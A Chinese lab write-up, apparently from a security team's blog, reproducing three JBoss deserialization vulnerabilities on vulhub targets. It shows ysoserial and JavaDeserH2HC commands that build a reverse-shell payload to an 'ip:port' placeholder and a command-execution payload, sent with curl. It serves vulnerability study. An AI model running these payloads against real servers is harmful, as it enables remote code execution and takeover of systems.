反序列化工具_JBOSS反序列化漏洞
10月13日
简简单单的复现一个漏洞0x00 起因 因为当初说要把vulhub上面的漏洞都复现一遍,然后今天看内网的书又头疼,python也学不下去,打开vulhub,然后随便一滚鼠标滑轮,刚刚好遇见这个漏洞,那就复现学习一下0x01 JBOSS
Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
0x02 JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
Jboss5.x/6.x版本,存在一个Java反序列化错误类型的漏洞,漏洞存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
该漏洞存在的页面为:url/invoker/readonly
1、搭建靶场
docker+vulhub
访问存在漏洞的页面:url/invoker/readonly
返回500则存在
2、编码需要执行的命令
查阅资料得知,jboss使用了Runtime.getRuntime().exec(),作用是调用命令脚本语言。
该方法不能使用bash等管道符方法,因此我们需要进行一次编码:
编码网址:
http://www.jackson-t.ca/runtime-exec-payloads.html
3、ysoserial生成序列化数据
将我们的反弹shell通过ysoserial进行序列化
得到一个pco.ser
4、对存在问题的网页进行传参
使用Curl命令直接传输
5、成功反弹shell
学习的时候发现,师傅们使用了另外一个工具包,javadeserh2hc,不用我们去编码执行的命令,自带反弹shell的方法。
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
0x03 JBoss JMXInvokerServlet 反序列化漏洞
JMX是一个java的管理协议,在Jboss中的JMXInvokerServlet可以使用HTTP协议与其进行通话。这一通信功能依赖于java的序列化类
1、搭建靶场
docker+vulhub
略
2、攻击方式
和前一个是一样的,换url即可,直接上截图
0x04 CVE-2017-7504
JbossMQ实现过程的JMS over HTTP InvocationLayer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码
版本:Jboss AS 4.x及之前版本
1、搭建环境
使用vulhub+docker搭建
略
2、使用上面说的另外一个java反序列化工具JavaDeserH2HC试试
//生成一个ExampleCommonsCollections1WithHashMapjavac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java//使用ExampleCommonsCollections1WithHashMap将命令touch /tmp/successtiehh进行序列java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/successtiehh
生成一个ExampleCommonsCollections1WithHashMap.ser文件,然后执行curl传参
(有水印?不慌,个人小号)
0x04 总结1、一两天花费一点认识一个洞,以后看见不会错过2、如果你也在复现学习漏洞,过程有问题可以一起讨论3、招亲,有意向留言,性别不卡死0x05 其他 如您有任何问题、建议、需求请后台留言NOVASEC公众号!团队初创,热烈希望现在以及未来的大佬们能够投稿支持!
反序列化工具_JBOSS反序列化漏洞相关推荐
- rmi 反序列化漏洞_写一个rmi反序列化工具
RMI(java 远程方法调用),RMI服务端和客户端之间通过序列化对象进行传输,所以JDK8 U121之前的版本存在反序列化漏洞.RMI和java反序列化原理就不详细介绍了.RMI反序列化利用成功的 ...
- java 反序列化工具 marshalsec改造 加入dubbo-hessian2 exploit
0x00 前言 1. 描述 官方github描述: Java Unmarshaller Security - Turning your data into code execution "将 ...
- Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
文章目录 一.分析定位 1. 漏洞描述 2. 项目引发漏洞简述 二. 若依系统 2.1. 版本升级 2.2. 配置文件 2.3. 推荐做法 2.4. 栗子 2.5. 项目场景 三.Gus系统 3.1. ...
- 关于Struts2及Weblogic反序列化工具被他人擅自公布下载的声明
Part1 前言 大家好,我是ABC_123.今天好多朋友给我发信息说,工具被人公布到某公众号提供下载了,还提倡加入qq群,好多人还误以为是我在提供下载,还误以为我与其他人进行合作啥的...(非A ...
- Typecho反序列化导致前台 getshell 漏洞复现
Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...
- rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警
报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...
- fastjson反序列化漏洞_【安全风险通告】fastjson反序列化远程代码执行漏洞安全风险通告...
近日,奇安信CERT监测到fastjson官方发布新版本,修补了一个反序列化远程代码执行漏洞.远程攻击者可利用该漏洞绕过autoType限制,进而可在目标服务器上执行任意命令.鉴于该漏洞影响较大,建议 ...
- 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选
各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...
- Oracle CoherenceWebLogic反序列化远程代码执行漏洞安全风险通告
近日,奇安信CERT监测到包含在1月份Oracle关键补丁程序更新CPU(Critical Patch Update)的漏洞,Oracle Coherence反序列化远程代码执行漏洞(CVE-2020 ...
最新文章
- Nodejs Guides(四)
- Visual Studio 2019 16.3 正式发布,支持 .NET Core 3.0
- x264编码参数大测试:03 subme与crf(c)
- 华北水利水电大学c语言程序设计四_我校代表队在“中国高等计算机大赛——团体程序设计天梯赛” 中喜获佳绩...
- java常见排序算法有哪些_Java中常用的6种排序算法详细分解
- webstorm简单介绍,webstrom基本使用
- 机器学习基础(二十五)—— Feature Selection
- 修改tomcat浏览器地址栏图标
- C#学习笔记之不安全代码
- Chrome 解决 CRX HEADER INVALID 问题
- Arduino小白的学习历程
- CAN总线车联网透传云网关简介
- 在美国的电子工程师眼中的中国电子行业!
- 【二胡音乐】陈军《胡弓传奇》
- STL之自定义缓冲区
- 菊读图的dijkstra
- Linux系统 ISO下载
- 网络基础-IP、端口等
- 中央财经的计算机类学什么时候,2019年3月全国计算机等级考试中央财经大学考试点报名通知...
- 正则表达式,python正则表达式
热门文章
- 单片机6年想转嵌入式Linux ,不知如何下手?
- linux启动mysql_【数据库】MySQL数据库入门学习
- html 常见hack,针对主流浏览器的CSS-HACK写法及IE常用条件注释
- oracle0数据库论文总结,大学oracle数据库总结(考试必备)
- rss spring 接口_spring 接口支持返回多种格式
- mysql存储引擎的方式_Mysql转换表存储引擎的三种方式
- python第9周小测验答案_智慧树_Python程序设计基础_章节测验答案
- Codeforces 920E-Connected Components? (set,补图,连通块)
- Gcd HDU - 6545 (基础数论)
- Problem E: 调用函数,整数逆序输出